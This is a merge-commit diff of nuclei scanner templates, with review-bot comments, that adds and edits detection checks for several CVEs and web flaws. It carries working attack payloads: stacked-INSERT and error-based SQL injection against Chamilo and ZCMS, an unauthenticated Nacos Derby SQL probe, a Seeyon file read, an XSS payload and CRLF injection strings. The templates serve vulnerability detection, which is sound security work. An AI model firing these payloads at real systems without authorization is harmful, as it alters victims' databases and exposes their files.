Merge pull request #46 from projectdiscovery/master

Update
patch-1
Dhiyaneshwaran 2021-05-01 07:45:51 +05:30 committed by GitHub
commit 5cf0900c6c
20 changed files with 254 additions and 62 deletions


@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | 297 | vulnerabilities | 139 | exposed-panels | 122 |
| takeovers | 67 | exposures | 88 | technologies | 64 |
| cves | 297 | vulnerabilities | 142 | exposed-panels | 122 |
| takeovers | 67 | exposures | 89 | technologies | 64 |
| misconfiguration | 57 | workflows | 30 | miscellaneous | 20 |
| default-logins | 24 | exposed-tokens | 0 | dns | 8 |
| fuzzing | 8 | helpers | 8 | iot | 11 |
**102 directories, 1021 files**.
**102 directories, 1031 files**.
</td>
</tr>


@ -1,36 +0,0 @@
id: CVE-2020-36287
info:
name: Jira Dashboard Gadgets / Information Disclosure
author: Jafar_Abo_Nada
severity: medium
description: The dashboard gadgets preference resource of the Atlassian gadgets plugin used in Jira Server and Jira Data Center before version 8.13.5, and from version 8.14.0 before version 8.15.1 allows remote anonymous attackers to obtain gadget related settings via a missing permissions check.
tags: cve,cve2020,jira,atlassian,disclosure
reference: |
- https://twitter.com/Jafar_Abo_Nada/status/1386058611084890116
- https://nvd.nist.gov/vuln/detail/CVE-2020-36287
# On a vulnerable instance, iterate through gadget ID from 10000 to 19999 to get exposed information /rest/dashboards/1.0/10000/gadget/{{id}}/prefs
requests:
- raw:
- |
GET /rest/dashboards/1.0/10000/gadget/10000/prefs HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
- |
GET /rest/dashboards/1.0/10000/gadget/10001/prefs HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1 == 200"
- "contains(body_1, '<userPrefsRepresentation>')"
- "status_code_2 != 401"
condition: and


@ -0,0 +1,30 @@
id: CVE-2021-29442
info:
name: Nacos prior to 1.4.1 Missing Authentication Check
description: |
In Nacos before version 1.4.1, the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out.
While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users.
These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql)
author: dwisiswant0
severity: high
reference: https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/
tags: nacos,auth-bypass,cve,cve2021
requests:
- method: GET
path:
- "{{BaseURL}}/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "application/json"
part: header
- type: regex
regex:
- "\"TABLENAME\":\"(?:(?:(?:(?:(?:APP_CONFIGDATA_RELATION_[PS]UB|SYS(?:(?:CONGLOMERAT|ALIAS|(?:FI|RO)L)E|(?:(?:ROUTINE)?|COL)PERM|(?:FOREIGN)?KEY|CONSTRAINT|T(?:ABLEPERM|RIGGER)|S(?:TAT(?:EMENT|ISTIC)|EQUENCE|CHEMA)|DEPEND|CHECK|VIEW|USER)|USER|ROLE)S|CONFIG_(?:TAGS_RELATION|INFO_(?:AGGR|BETA|TAG))|TENANT_CAPACITY|GROUP_CAPACITY|PERMISSIONS|SYSCOLUMNS|SYS(?:DUMMY1|TABLES)|APP_LIST)|CONFIG_INFO)|TENANT_INFO)|HIS_CONFIG_INFO)\""
part: body
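Review bot: The probe `{{BaseURL}}/nacos/v1/cs/ops/derby?sql=...` executes SQL on the target's embedded Derby database, and the description itself notes the endpoint can also wipe that database, yet nothing in the file records that the query was deliberately kept to a read-only SELECT on a system table; add a comment above the path such as `# read-only probe: SELECT on sys.systables only; keep this query non-mutating` so a later edit does not turn it into something destructive. The `description` is a `|` literal block, which preserves the three hard line breaks and a trailing newline inside the value; `>-` would fold it into one paragraph, which reads better wherever nuclei prints it. Since the id is a CVE, `reference` could also carry the NVD entry for the id next to the GHSL advisory.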


@ -0,0 +1,24 @@
id: exposed-mysql-initial
info:
name: Exposed mysql.initial
author: ELSFA7110
severity: info
reference: https://hackerone.com/reports/1081817
tags: config,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/mysql.initial.sql"
matchers-condition: and
matchers:
- type: word
words:
- "Roundcube Webmail initial database structure"
part: body
- type: status
status:
- 200
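Review bot: The body matcher `- "Roundcube Webmail initial database structure"` is Roundcube-specific, but neither `name` nor `tags` mention Roundcube, so the finding cannot be scoped or searched by product; suggest `name: Exposed Roundcube mysql.initial.sql` and `tags: config,exposure,roundcube`. A one-line `description` stating that the file is Roundcube's shipped schema script (the matched string says "initial database structure", not live data) would also explain why `severity: info` is appropriate.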


@ -21,8 +21,8 @@ requests:
- type: word
words:
- 'results'
- 'items'
- 'more'
- '"results":'
- '"items":'
- '"more":'
part: body
condition: and


@ -16,11 +16,9 @@ requests:
- type: word
part: body
words:
- "JAVA_HOME"
- "sping.config.location"
- "spring.application.name"
- "applicationConfig"
- "local.server.port"
condition: or
condition: and
- type: status
status:
- 200


@ -0,0 +1,34 @@
id: springboot-httptrace
info:
name: Detect Springboot httptrace
author: that_juan_ & dwisiswant0 & wdahlenb
severity: low
description: View recent HTTP requests and responses
requests:
- method: GET
path:
- "{{BaseURL}}/actuator/httptrace"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"traces"'
- '"timestamp"'
- '"principal"'
- '"session"'
condition: and
- type: status
status:
- 200
- type: word
words:
- "application/json"
- "application/vnd.spring-boot.actuator"
- "application/vnd.spring-boot.actuator.v1+json"
condition: or
part: header
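Review bot: The `info` block has no `tags` and no `reference`, unlike the other templates added in this commit (e.g. `tags: network,rmi`), so this template is invisible to tag-based runs; add something like `tags: springboot,exposure`. In the header matcher, `"application/vnd.spring-boot.actuator"` is a substring of `"application/vnd.spring-boot.actuator.v1+json"`, so the third entry can never contribute a match and can be dropped. Note also that this template and the modified springboot trace template later in the commit both request `{{BaseURL}}/actuator/httptrace`, so one host now gets two overlapping probes for the same endpoint; decide which template owns it.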


@ -17,8 +17,8 @@ requests:
part: body
words:
- '"loggers"'
- '"profiles":'
condition: or
- '"levels"'
condition: and
- type: status
status:


@ -10,22 +10,21 @@ requests:
- method: GET
path:
- "{{BaseURL}}/trace"
- "{{BaseURL}}/actuator/trace"
- "{{BaseURL}}/httptrace"
- "{{BaseURL}}/actuator/httptrace"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "traces"
- "response"
- "request"
- "principal"
condition: or
- '"timestamp"'
- '"info"'
- '"method"'
- '"path"'
condition: and
- type: status
status:
- 200
- type: word
words:
- "application/json"


@ -0,0 +1,21 @@
id: java-rmi-detect
info:
name: Detect Java RMI Protocol
author: F1tz
severity: info
tags: network,rmi
network:
- inputs:
- data: "{{hex_decode('4a524d4900024b')}}"
host:
- "{{Hostname}}"
read-size: 1024
matchers:
- type: regex
part: raw
regex:
- "^N\\x00\\x0e(\\d{1,3}\\.){3}\\d{1,3}\\x00\\x00"


@ -0,0 +1,24 @@
id: weblogic-iiop-detect
info:
name: Detect Weblogic IIOP Protocol
author: F1tz
severity: info
description: Check IIOP protocol status.
tags: network,weblogic
network:
- inputs:
- data: "{{hex_decode('47494f50010200030000001700000002000000000000000b4e616d6553657276696365')}}"
host:
- "{{Hostname}}"
read-size: 1024
matchers-condition: and
matchers:
- type: word
words:
- "GIOP"
- "weblogic"
condition: and
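Review bot: `matchers-condition: and` is redundant: there is a single matcher, and it already carries its own `condition: and` for the two words, so drop the top-level key and let the file read like the sibling `weblogic-t3-detect`. The matcher also sets no `part:`, whereas `java-rmi-detect` in this commit uses `part: raw`; if the network-matcher default is anything other than the raw response, spell it out. A comment noting that the hex payload begins with `47494f50` (`GIOP`, the very magic the matcher then looks for) would make the probe reviewable at a glance.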


@ -0,0 +1,20 @@
id: weblogic-t3-detect
info:
name: Detect Weblogic T3 Protocol
author: F1tz
severity: info
description: Check T3 protocol status.
tags: network,weblogic
network:
- inputs:
- data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n"
host:
- "{{Hostname}}"
read-size: 1024
matchers:
- type: word
words:
- "HELO"


@ -3,9 +3,9 @@ id: fastly-takeover
info:
name: fastly takeover detection
author: pdcommunity
severity: high
severity: info
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz
reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/22
requests:
- method: GET
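Review bot: Dropping `severity` from `high` to `info` on a takeover template changes how every user triages the result, yet the only trace of the reason is the `reference` URL now pointing at the issue; add a `description` that records it (presumably the linked issue concludes a Fastly takeover is not reliably exploitable), e.g. `description: Severity set to info; see the linked issue for why a Fastly takeover is not considered reliably exploitable`, so the next contributor does not bump it back. The matcher section is outside the hunk, so I cannot tell whether it was adjusted to match the downgrade.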


@ -18,6 +18,7 @@ requests:
- "{{BaseURL}}/%0ASet-Cookie%3Acrlfinjection/.." # Apache
- "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection" # CVE-2016-4975
- "{{BaseURL}}/?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%
0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection"
- "{{BaseURL}}/?Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection"
matchers:
- type: regex


@ -45,5 +45,5 @@ requests:
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com(?:\s*?)$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
part: header
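Review bot: Replacing `(?:\s*?)$` with `.*$` after `example\.com` makes the regex accept any continuation, including `Location: https://example.com.target.tld/...`, where the redirect stays on a host under the target's own domain and is not an open redirect; the old pattern rejected that. If the intent was to allow a path, port or query after the host, restrict the continuation to those delimiters instead: `- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com(?:[/?#:]|\s*$)'`. The `requests` block starts outside the hunk.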


@ -0,0 +1,25 @@
id: WooYun-2015-148227
info:
name: Seeyon WooYun LFR
author: princechaddha
severity: high
reference: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html
tags: seeyon,wooyun,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<servlet-name>NCInvokerServlet</servlet-name>"
part: body
- type: word
part: header
words:
- "application/xml"


@ -0,0 +1,29 @@
id: chamilo-lms-sqli
info:
author: undefl0w
name: Chamilo LMS SQL Injection
severity: high
description: Finds sql injection in Chamilo version 1.11.14
tags: chamilo,sqli
requests:
- raw:
- |
POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
type=image&field_id=image&tag=image&from=image&search=image&options=["test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'{{randstr}}'); INSERT INTO extra_field_options(option_value) VALUES ('{{randstr}}'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '{{randstr}}', 16,0) ON DUPLICATE KEY UPDATE tag='{{randstr}}', field_id=16, count=0; -- "]
- |
POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
type=image&field_id=image&tag=image&from=image&search=image&options=["test') or 1=1 -- "]
req-condition: true
matchers:
- type: dsl
dsl:
- 'contains(body_2, "{{randstr}}")'
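Review bot: The first request sends stacked `INSERT ... ; ... ON DUPLICATE KEY UPDATE` statements, so a positive result is obtained by writing rows into the target's `extra_field_rel_tag`, `extra_field_values`, `extra_field_options` and `tag` tables, and nothing in the template removes them; the `description` (`Finds sql injection in Chamilo version 1.11.14`) must state that the check modifies the target database and is not safe for production scans, and the template should carry whatever tag the repository uses for intrusive checks so operators can exclude it. Because the inserts use the fixed id `16`, a second run against the same host may fail on unique keys if those tables have them, turning a still-vulnerable host into a false negative; worth noting in the description too. The DSL matcher only inspects `body_2`, so a failed or blocked first request is indistinguishable from a non-vulnerable host.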


@ -10,15 +10,14 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/chamilo/main/calendar/agenda_list.php?type=x"%20onmouseover=xss(0x01CE61)%20x="#collapse-personal_1'
- '{{BaseURL}}/main/calendar/agenda_list.php?type=x"%20onmouseover=xss(0x01CE61)%20x="#collapse-personal_1'
- '{{BaseURL}}/main/calendar/agenda_list.php?type=xss"+onmouseover=alert(document.domain)+"'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "onmouseover%3dxss(0x01CE61)"
- 'agenda_js.php?type=xss" onmouseover=alert(document.domain)'
- type: status
status:
- 200
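Review bot: The body matcher `agenda_js.php?type=xss" onmouseover=alert(document.domain)` fires on any response that echoes the query string, including JSON or plain-text error bodies where the reflection is inert, because nothing checks that the response is HTML; `matchers-condition: and` is already in place, so add a `text/html` header matcher next to the status check, as the phpinfo-style template later in this commit does. The `info` block is outside the hunk, so I cannot tell whether `description` was updated for the new payload.
```yaml
    matchers:
      # … unchanged: body word matcher and status matcher …
      - type: word
        part: header
        words:
          - "text/html"
```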


@ -0,0 +1,21 @@
id: zcms-v3-sqli
info:
name: ZCMS SQL Injection
author: princechaddha
severity: high
reference: https://www.anquanke.com/post/id/183241
tags: zcms,sqli
requests:
- method: GET
path:
- "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "6f7c6dcbc380aac3bcba1f9fccec991e"
part: body
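Review bot: The injection rides on `cms_channel.php?del=123456+AND+...`, i.e. a delete action on an admin page, so the probe's safety on a live target depends on channel id `123456` not existing; that assumption should be written next to the path, e.g. `# del= is a delete action; 123456 is an id assumed not to exist, keep it implausible`. The matcher word `6f7c6dcbc380aac3bcba1f9fccec991e` is an opaque hash with nothing tying it to the `md5(202072102)` in the payload; record the relationship (`# expected md5 of the literal sent in the payload, echoed back in the duplicate-entry error`) so one side is not changed without the other.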


@ -63,7 +63,10 @@ requests:
- type: word
words:
- 'Nuclei - Open source project (github.com/projectdiscovery/nuclei)'
- "PHP Version"
- "Configuration Command"
part: body
condition: and
- type: word
words:
- 'text/html'
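Review bot: With `condition: and` the matcher now requires the literal `Nuclei - Open source project (github.com/projectdiscovery/nuclei)` alongside `PHP Version` and `Configuration Command`, which presumably works because phpinfo() echoes the scanner's default User-Agent; any run with a custom User-Agent header then silently never matches, which deserves a comment above the words list: `# first word is nuclei's default User-Agent as reflected by phpinfo(); a custom UA header disables this matcher`. Consider whether `PHP Version` and `Configuration Command`, the actual phpinfo markers, are signal enough so the template does not depend on the scanner's identity string. The template's requests and the rest of the `text/html` matcher are outside the hunk.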